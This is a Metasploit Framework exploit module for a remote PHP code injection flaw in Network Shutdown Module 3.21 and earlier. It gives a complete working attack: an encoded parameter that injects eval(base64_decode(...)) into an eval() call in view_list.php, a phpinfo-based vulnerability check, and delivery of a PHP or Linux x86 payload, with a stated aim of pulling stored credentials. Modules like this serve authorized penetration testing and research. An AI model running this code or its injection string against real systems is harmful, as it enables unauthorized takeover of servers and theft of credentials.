##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

#   http://metasploit.com/

##



require 'msf/core'

require 'msf/core/exploit/php_exe'



class Metasploit3 < Msf::Exploit::Remote

    Rank = ExcellentRanking



    include Msf::Exploit::Remote::HttpClient

    include Msf::Exploit::PhpEXE



    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',

            'Description'    => %q{

                This module exploits a vulnerability in lib/dbtools.inc which uses

                unsanitized user input inside a eval() call. Additionally the base64 encoded

                user credentials are extracted from the database of the application. Please

                note that in order to be able to steal credentials, the vulnerable service

                must have at least one USV module (an entry in the "nodes" table in mgedb.db)

            },

            'Author'         =>

                [

                    'h0ng10',  # original discovery, msf module

                    'sinn3r'   # PhpEXE shizzle

                ],

            'License'        => MSF_LICENSE,

            'References'     =>

                [

                    ['OSVDB', '83199'],

                    ['URL', 'http://secunia.com/advisories/49103/']

                ],

            'Payload'        =>

                {

                    'DisableNops' => true,

                    'Space'       => 4000

                },

            'Platform'       => ['php', 'linux'],

            'Arch'           => ARCH_PHP,



            'Targets'        =>

                [

                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],

                    [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]

                ],

            'DefaultTarget'  => 0,

            'Privileged'     => true,

            'DisclosureDate' => 'Jun 26 2012'

        ))



        register_options(

            [

                Opt::RPORT(4679)

            ], self.class)

    end



    def check

        # we use a call to phpinfo() for verification

        res = execute_php_code("phpinfo();die();")



        if not res or res.code != 200

            print_error("Failed: Error requesting page")

            return CheckCode::Unknown

        end



        return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)

        return CheckCode::Safe

    end



    def execute_php_code(code, opts = {})

        param_name = rand_text_alpha(6)

        padding    = rand_text_alpha(6)

        url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"



        res = send_request_cgi(

            {

                'uri'   =>  '/view_list.php',

                'method' => 'POST',

                'vars_get' =>

                    {

                        'paneStatusListSortBy' => url_param,

                    },

                'vars_post' =>

                    {

                        param_name => Rex::Text.encode_base64(code),

                    },

                'headers' =>

                    {

                        'Connection' => 'Close',

                    }

            })

    end



    def no_php_tags(p)

        p = p.gsub(/^<\?php /, '')

        p.gsub(/ \?\>$/, '')

    end



    def exploit

        print_status("#{rhost}:#{rport} - Sending payload")



        unlink = (target['Platform'] == 'linux') ? true : false

        p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))



        execute_php_code(p)

        handler

    end

end